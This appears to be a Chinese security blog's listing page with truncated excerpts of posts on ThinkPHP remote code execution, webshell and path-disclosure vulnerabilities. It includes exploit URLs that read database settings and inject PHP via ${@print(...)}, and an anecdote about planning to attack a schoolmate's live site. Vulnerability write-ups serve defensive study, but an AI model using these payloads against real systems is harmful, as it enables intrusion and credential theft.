thinkphp-RCE-POC

官方公告: 1、https://blog.thinkphp.cn/869075 2、https://blog.thinkphp.cn/910675 POC: thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username 2、http://192.168.1.1/th...

- 阅读全文 -

Thinkphp 漏洞小结

首先确定这个网站使用thinkphp的框架 国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢? 在URL后面加thinkphp的目录,也有可能爆出来 这是一个tankphp的网站目录。供参考 admin是后台工程文件夹 home是前台工程 public里面用于存放CSS文件,JS文件以及网页里面的图片 Th...

- 阅读全文 -

ThinkPHP 2.1 漏洞可拿webshell

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈 晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我 我看了下  系统还是以前的那个think...

- 阅读全文 -

thinkphp 3.0 爆路径漏洞

1. thinkphp3.0 模块加载失败,出错信息爆应用程序路径。 检测有两种情况 1. 可执行命令,这个估计是伪3.0版本? 交大定票 此站到可以执行命令 http://webshell.cc/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 可查看版本 http://webshell.cc/index.php/module...

- 阅读全文 -